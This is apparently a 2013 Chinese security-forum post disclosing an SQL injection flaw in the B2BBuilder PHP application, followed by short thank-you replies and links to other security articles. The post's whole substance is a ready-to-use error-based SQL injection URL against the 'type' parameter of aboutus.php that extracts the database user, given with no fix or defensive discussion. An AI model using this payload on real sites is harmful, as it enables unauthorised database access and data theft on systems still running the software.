[我爱t00ls] B2BBuilder 注入漏洞

2013-09-05 01:37:59 17 xiaoxiaoabc 4385

最近工作好忙,这不有时间了,看看php代码,不能生锈呢.

直接上利用方式,大家一看就懂.

http://localhost/b2b/aboutus.php?type=12345'  aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b) and 'z'='z

类别 Web安全

关于作者

xiaoxiaoabc68篇文章777篇回复

xiaoxiaoabc

评论17次

要评论？请先登录或注册

17楼

krystalvip
2016-7-8 18:36

收藏了，感谢楼主

回复|@ta|踩(0)|顶(0)
16楼

xia1234
2013-9-28 16:08

这个可以有。

回复|@ta|踩(0)|顶(0)
15楼

dullub
2013-9-27 23:06

为啥这套程序都下载下来啊

回复|@ta|踩(0)|顶(0)
14楼

—7℃
2013-9-10 18:45

看完了，就得回复下

回复|@ta|踩(0)|顶(0)
13楼

ji4nr3n
2013-9-10 18:26

感谢作者的无私奉献

回复|@ta|踩(0)|顶(0)
12楼

cc4ss
2013-9-10 17:12

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
11楼

kk_skipper
2013-9-7 09:08

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
10楼

yantou
2013-9-6 21:09

收了谢谢啊

回复|@ta|踩(0)|顶(0)
9楼

xiaoxiaoabc
2013-9-5 21:07

mlgb

回复|@ta|踩(0)|顶(0)
8楼

lmy
2013-9-5 19:34

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
7楼

cnxxxxcn
2013-9-5 15:21

这个可以呵呵~~~

回复|@ta|踩(0)|顶(0)
6楼

Yaseng
2013-9-5 15:05

支持下lz

回复|@ta|踩(0)|顶(0)
5楼

wepeng
2013-9-5 10:29

呵呵，支持一下、、、、

回复|@ta|踩(0)|顶(0)
4楼

uuwhat
2013-9-5 09:01

感谢

回复|@ta|踩(0)|顶(0)
3楼

twygame
2013-9-5 08:56

牛BB的人啊。。求带。

回复|@ta|踩(0)|顶(0)
2楼

hiicome
2013-9-5 06:36

收下了。都不错的

回复|@ta|踩(0)|顶(0)
1楼

52pride
2013-9-5 02:02

沙发

回复|@ta|踩(0)|顶(0)

安全资讯Anthropic称中国AI公司利用1600万次Claude查询复制模型

Anthropic周一表示，它发现了由三家人工智能(AI)公司DeepSeek、M ...

2026-02-25 05:57:55 6 1816

安全资讯霍尼韦尔关键基础设施闭路电视监控系统存在身份验证绕过漏洞

美国网络安全和基础设施安全局 (CISA) 警告称，多款霍尼韦尔闭路 ...

2026-02-20 00:43:43 6 1724

渗透测试记一次SEO引流后门的webshell应急响应样本分析

写在最前：由于工作性质，不写具体事件前后经过，本贴只对攻击者 ...

2026-02-02 09:31:19 35 3277

安全资讯大疆扫地机被Claude Code逆向并发掘漏洞可远程控制扫地机目前已修复

多数智能扫地机都附带摄像头和远程控制功能，并且多数核心功能还 ...

2026-02-27 01:35:06 7 1757

精华推荐

代码学习驱动编程：执行过滤驱动的实现与关键代码

本来周末就可以完工的，结果因为自己犯了几个傻逼错误导致推迟了 ...

2014-12-09 00:59:07 23 555

渗透测试Java 安全 | 反序列化 URLDNS+CC+自己挖一条链+CB

## 前言如同标题一样, 本篇文章会介绍反序列化漏洞的基本原理， ...

2024-11-28 11:04:04 1 520

渗透测试神奇的order by注入

一、判断order by注入当你看到一个查询结果有排序小箭头时，要额 ...

2024-12-19 14:42:29 32 1224

渗透测试【奇技淫巧】【对某相亲网的一次渗透】--过程详细到另我自己都发指【2016五一快乐-详情首发】

自认为整个过程写的非常详细，虽然此文章我发表到某平台，但是没 ...

2016-05-01 09:44:34 106 3339

渗透测试Windows认证原理解析基础入门学习

#### 0x01 前言简介本文借鉴安全界各位大佬所写的Windows认证入 ...

2020-03-17 13:07:21 17 885

Top ↑

[我爱t00ls] B2BBuilder 注入漏洞

关于作者

评论17次

收藏了，感谢楼主

这个可以有。

为啥这套程序都下载下来啊

看完了，就得回复下

感谢作者的无私奉献

支持原创，谢谢分享。

支持原创，谢谢分享。

收了谢谢啊

mlgb

支持原创，谢谢分享。

这个可以 呵呵~~~

支持下lz

呵呵，支持一下、、、、

感谢

牛BB的人啊。。求带。

收下了。都不错的

沙发

热门文章

安全资讯Anthropic称中国AI公司利用1600万次Claude查询复制模型

安全资讯霍尼韦尔关键基础设施闭路电视监控系统存在身份验证绕过漏洞

渗透测试记一次SEO引流后门的webshell应急响应样本分析

安全资讯大疆扫地机被Claude Code逆向并发掘漏洞可远程控制扫地机 目前已修复

最新回复

精华推荐

代码学习驱动编程：执行过滤驱动的实现与关键代码

渗透测试Java 安全 | 反序列化 URLDNS+CC+自己挖一条链+CB

渗透测试神奇的order by注入

渗透测试【奇技淫巧】【对某相亲网的一次渗透】--过程详细到另我自己都发指【2016五一快乐-详情首发】

渗透测试Windows认证原理解析基础入门学习

这个可以呵呵~~~

安全资讯大疆扫地机被Claude Code逆向并发掘漏洞可远程控制扫地机目前已修复